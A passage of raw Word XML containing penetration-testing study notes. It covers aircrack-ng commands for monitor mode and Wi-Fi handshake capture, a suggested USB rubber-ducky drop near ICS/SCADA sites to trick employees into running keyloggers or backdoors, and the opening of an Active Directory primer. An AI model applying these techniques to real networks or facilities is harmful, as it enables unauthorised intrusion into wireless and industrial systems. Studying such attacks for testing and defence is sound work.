        </w:rPr>
        <w:t>tkiptun-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2884B09A" w14:textId="285078D7" w:rsidR="00BB2E0E" w:rsidRDefault="00BB2E0E" w:rsidP="00B37AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>wesside-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E291B3" w14:textId="77777777" w:rsidR="00A918CE" w:rsidRDefault="00A918CE" w:rsidP="00A918CE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57FC3E0D" w14:textId="22A400D7" w:rsidR="00D05141" w:rsidRDefault="00D05141" w:rsidP="00A918CE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Putting </w:t>
      </w:r>
      <w:r w:rsidR="007B7A9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“wlan0” into monitor mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECC65C3" w14:textId="54FBE700" w:rsidR="007B7A9D" w:rsidRDefault="007B7A9D" w:rsidP="007B7A9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“airmon-ng start wlan0 (Or any network interface)</w:t>
      </w:r>
      <w:r w:rsidR="002947D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62336B5B" w14:textId="7DE7AE93" w:rsidR="002947D3" w:rsidRDefault="00640D5E" w:rsidP="00640D5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>After enabling, new interface name is “wlan0mon”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61342144" w14:textId="1862D9C1" w:rsidR="00640D5E" w:rsidRDefault="0064432C" w:rsidP="00640D5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">If other </w:t>
      </w:r>
      <w:r w:rsidR="006A4754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>processes are currently trying to use that networking adapter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8DCC71" w14:textId="393963B7" w:rsidR="006A4754" w:rsidRDefault="006A4754" w:rsidP="006A4754">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“airmon-ng check kill”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149FC955" w14:textId="0A2422AE" w:rsidR="006A4754" w:rsidRDefault="00381C9D" w:rsidP="006A4754">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>To create a packet capture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4DBACB" w14:textId="02564426" w:rsidR="00381C9D" w:rsidRDefault="00F36637" w:rsidP="00F36637">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“airodump-ng”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA06C20" w14:textId="17C33B33" w:rsidR="000525E4" w:rsidRDefault="000525E4" w:rsidP="000525E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>By default, airodump-ng only captures 2.4GHz networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADCCF0C" w14:textId="14E01CAD" w:rsidR="000525E4" w:rsidRDefault="00E56B9A" w:rsidP="00E56B9A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Use ‘—bssid’ to </w:t>
      </w:r>
      <w:r w:rsidR="002C00C7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>set the BSSID to monitor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E05BAC5" w14:textId="262539F5" w:rsidR="002C00C7" w:rsidRDefault="002C00C7" w:rsidP="002C00C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Use ‘—channel’ to switch the monitored channel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7F03B7" w14:textId="5F99642D" w:rsidR="00770BE1" w:rsidRPr="0011683E" w:rsidRDefault="00770BE1" w:rsidP="00770BE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Use ‘-w’ to write the output to a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6277E570" w14:textId="6B24B9D6" w:rsidR="0011683E" w:rsidRDefault="0011683E" w:rsidP="00770BE1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">If you can capture the handshake that </w:t>
      </w:r>
      <w:r w:rsidR="00770C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>the client (</w:t>
      </w:r>
      <w:r w:rsidR="00FE43BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>individual</w:t>
      </w:r>
      <w:r w:rsidR="00770C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>) initiates with the server (network)</w:t>
      </w:r>
      <w:r w:rsidR="00FE43BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, you can receive the hash for that network. Airodump can do this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E8081E" w14:textId="77777777" w:rsidR="00FE43BB" w:rsidRDefault="00FE43BB" w:rsidP="00770BE1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="547189F2" w14:textId="4589746A" w:rsidR="002B08EF" w:rsidRDefault="00D62F4D" w:rsidP="00D62F4D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ICS/SCADA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AB2BD4" w14:textId="77777777" w:rsidR="00D62F4D" w:rsidRDefault="00D62F4D" w:rsidP="00D62F4D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D5B323" w14:textId="62E82579" w:rsidR="00D62F4D" w:rsidRDefault="00D62F4D" w:rsidP="00D62F4D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ICS – Industrial Control Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3988EEA3" w14:textId="6D42C53B" w:rsidR="00D62F4D" w:rsidRPr="0089428B" w:rsidRDefault="00D62F4D" w:rsidP="0089428B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0089428B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Essentially what </w:t>
      </w:r>
      <w:r w:rsidR="0089428B" w:rsidRPr="0089428B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>powers</w:t>
      </w:r>
      <w:r w:rsidRPr="0089428B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> a lot of </w:t>
      </w:r>
      <w:r w:rsidR="0089428B" w:rsidRPr="0089428B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">industries that utilize operational technology, such as air, rail, energy production, </w:t>
      </w:r>
      <w:r w:rsidR="00693164">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">prisons, </w:t>
      </w:r>
      <w:r w:rsidR="0089428B" w:rsidRPr="0089428B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ETC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314956F7" w14:textId="77777777" w:rsidR="0089428B" w:rsidRDefault="0089428B" w:rsidP="00D62F4D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64657E9B" w14:textId="2AA26634" w:rsidR="0089428B" w:rsidRDefault="0089428B" w:rsidP="00D62F4D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">PLCs </w:t>
      </w:r>
      <w:r w:rsidR="0013263D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0013263D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Programmable Logic Controllers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7621D788" w14:textId="5E35B293" w:rsidR="0013263D" w:rsidRDefault="0013263D" w:rsidP="0013263D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>What ICS runs on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105B6872" w14:textId="32E9594D" w:rsidR="0013263D" w:rsidRDefault="0013263D" w:rsidP="0013263D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>They do a lot of simple tasks</w:t>
      </w:r>
      <w:r w:rsidR="00011D5B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and are simple computers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516D316F" w14:textId="2DB56885" w:rsidR="00011D5B" w:rsidRDefault="00011D5B" w:rsidP="0013263D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Allow the operators to do certain things such as open doors, close doors, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373305EB" w14:textId="77777777" w:rsidR="00011D5B" w:rsidRDefault="00011D5B" w:rsidP="00011D5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24E1B352" w14:textId="3964D408" w:rsidR="00011D5B" w:rsidRDefault="00F60149" w:rsidP="00F60149">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Probably out of scope: Rubber duckies can be used to gain initial access </w:t>
      </w:r>
      <w:r w:rsidR="00CF5A17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>into an ICS system as an example.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F00D42C" w14:textId="77777777" w:rsidR="00CF5A17" w:rsidRPr="00CF5A17" w:rsidRDefault="00CF5A17" w:rsidP="00CF5A17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E33A9AB" w14:textId="2DEA384C" w:rsidR="00CF5A17" w:rsidRDefault="00CF5A17" w:rsidP="00CF5A17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Rubber duckies (as noted in the Social Eng doc) are essentially just thumbdrives that host malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C301CB" w14:textId="05B56A82" w:rsidR="00CF5A17" w:rsidRDefault="00CF5A17" w:rsidP="00CF5A17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">When a rubber duckie is inserted into a computer, it is recognized as a KEYBOARD. This allows it to </w:t>
      </w:r>
      <w:r w:rsidR="00F709EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>use various keystrokes that it needs to do for its exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B847067" w14:textId="1FBD5C81" w:rsidR="00F709EB" w:rsidRDefault="00F709EB" w:rsidP="00CF5A17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploits in rubber duckies can be anything, such as </w:t>
      </w:r>
      <w:r w:rsidR="0017386D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>recording the camera of a computer</w:t>
      </w:r>
      <w:r w:rsidR="00285B3E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0017386D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>keylogging to capture passwords</w:t>
      </w:r>
      <w:r w:rsidR="00285B3E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, generating backdoors, etc</w:t>
      </w:r>
      <w:r w:rsidR="0017386D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D62C4F" w14:textId="3620A7C8" w:rsidR="00A87804" w:rsidRPr="00563E42" w:rsidRDefault="0017386D" w:rsidP="00563E42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">For the social engineering aspect, </w:t>
      </w:r>
      <w:r w:rsidR="001011F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">leaving the rubber duckies around an area nearby the </w:t>
      </w:r>
      <w:r w:rsidR="00462D54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ICS physical infrastructure in hopes that an employee finds one and inserts it into a machine on the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A45D055" w14:textId="77777777" w:rsidR="00770BE1" w:rsidRPr="00770BE1" w:rsidRDefault="00770BE1" w:rsidP="00770BE1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7499AEBF" w14:textId="69CA10D1" w:rsidR="002C00C7" w:rsidRDefault="00497DBF" w:rsidP="00497DBF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ACTIVE DIRECTORY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3764707C" w14:textId="77777777" w:rsidR="00497DBF" w:rsidRDefault="00497DBF" w:rsidP="00497DBF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55A78E8E" w14:textId="15281D1F" w:rsidR="00497DBF" w:rsidRDefault="00205440" w:rsidP="00497DBF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">At its barebones, Active Directory </w:t>
      </w:r>
      <w:r w:rsidR="0008195E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>utilizes a Windows domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E322C6" w14:textId="6822ABDD" w:rsidR="0008195E" w:rsidRDefault="0008195E" w:rsidP="0008195E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>A Windows domain</w:t>
      </w:r>
      <w:r w:rsidR="00B65E62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> is essentially a group of users and computers under the administration of a given business.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0240B3B3" w14:textId="4C3FA702" w:rsidR="00A55D02" w:rsidRDefault="00A55D02" w:rsidP="0008195E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The main idea of this is a single repository with </w:t>
      </w:r>
      <w:r w:rsidR="00EC53D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">a centralized platform </w:t>
      </w:r>
      <w:r w:rsidR="001538D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="00EC53D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> different Windows computer components.</w:t>
      </w:r>
      <w:r w:rsidR="009C47B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is Active Directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BB7A62" w14:textId="30F5A6EC" w:rsidR="009C47B8" w:rsidRDefault="009C47B8" w:rsidP="0008195E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The server that runs the Active Directory service is known as the Domain Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553451D0" w14:textId="77777777" w:rsidR="007079F8" w:rsidRDefault="007079F8" w:rsidP="007079F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24E72D18" w14:textId="779064BE" w:rsidR="007079F8" w:rsidRDefault="007079F8" w:rsidP="007079F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Advantages of </w:t>
      </w:r>
      <w:r w:rsidR="00DF485D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>having a configured Windows domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E836FA" w14:textId="0E41C410" w:rsidR="007079F8" w:rsidRDefault="007079F8" w:rsidP="007079F8">
      <w:pPr>
        <w:rPr>
